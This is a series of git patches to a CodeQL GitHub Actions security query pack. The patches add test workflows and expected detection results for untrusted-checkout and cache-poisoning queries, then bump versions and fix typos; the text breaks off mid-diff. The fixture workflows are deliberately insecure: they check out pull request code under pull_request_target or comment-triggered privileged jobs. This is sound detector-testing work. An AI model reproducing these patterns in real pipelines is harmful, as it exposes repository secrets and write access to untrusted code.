.github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | @@ -104,6 +156,11 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | #select +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml new file mode 100644 index 00000000000..6900c3bc23f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml new file mode 100644 index 00000000000..5501beb9ea2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml @@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml new file mode 100644 index 00000000000..4d5ae1f528c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml new file mode 100644 index 00000000000..96fd8bdd1a4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml @@ -0,0 +1,37 @@ +name: Tests +on: + push: + branches: + - master + pull_request: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + codeql test run ql/test diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 29b311435dd..57efc8af35d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -198,6 +198,58 @@ edges | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -242,6 +294,12 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | @@ -261,5 +319,7 @@ edges | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 5bf0e56e1b7..61c328b7011 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,7 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 4aba07074c8b17e9a276216911475eb27749d57c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:45:13 +0200 Subject: [PATCH 0353/1267] Bump qlpack versionsi --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 847a7b83e54..5369af75489 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.5 +version: 0.1.6 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index be2b4e428c9..a019dd6f695 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.5 +version: 0.1.6 groups: [actions, queries] suites: codeql-suites extractor: javascript From 5997038923a8d7b0d36c175f569974f576aad4f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:07:02 +0200 Subject: [PATCH 0354/1267] Exclude self-hosted query from CodeScanning suite --- ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index 621b7fb050d..b32fe406877 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -9,6 +9,8 @@ * @tags actions * security * external/cwe/cwe-284 + * testing + * experimental */ import codeql.actions.security.SelfHostedQuery From d11c15dc287049b8afec4c6c0d10a163d9739c04 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:07:55 +0200 Subject: [PATCH 0355/1267] Bump qlpack versionsi --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5369af75489..b2b92e45e7a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.6 +version: 0.1.7 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a019dd6f695..899f62cf9ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.6 +version: 0.1.7 groups: [actions, queries] suites: codeql-suites extractor: javascript From eeba26a647b5d8d7a2c6f316f159ecccac87711d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:55:21 +0200 Subject: [PATCH 0356/1267] fix typos --- ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index b71b3cbba99..9f7f3fd8cee 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind path-problem diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 9faab24dbcb..980560dac9a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 574c2d7bffe..89d2e741306 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem From 4516d3df812d065888e374a1662cf9b3e6d6a8d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 16:09:49 +0200 Subject: [PATCH 0357/1267] Bump qlpack versions --- ql/lib/codeql-pack.lock.yml | 12 ++++++------ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 12 ++++++------ ql/test/codeql-pack.lock.yml | 12 ++++++------ 4 files changed, 22 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 4b8239b7f6c..21e0b8bb0e9 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b2b92e45e7a..5f3825a9157 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: github/actions-all version: 0.1.7 dependencies: - codeql/util: ^1.0.0 - codeql/yaml: ^1.0.0 - codeql/controlflow: ^1.0.0 - codeql/dataflow: ^1.0.0 + codeql/util: ^1.0.1 + codeql/yaml: ^1.0.1 + codeql/controlflow: ^1.0.1 + codeql/dataflow: ^1.0.1 extractor: javascript groups: javascript dataExtensions: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 4b8239b7f6c..21e0b8bb0e9 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 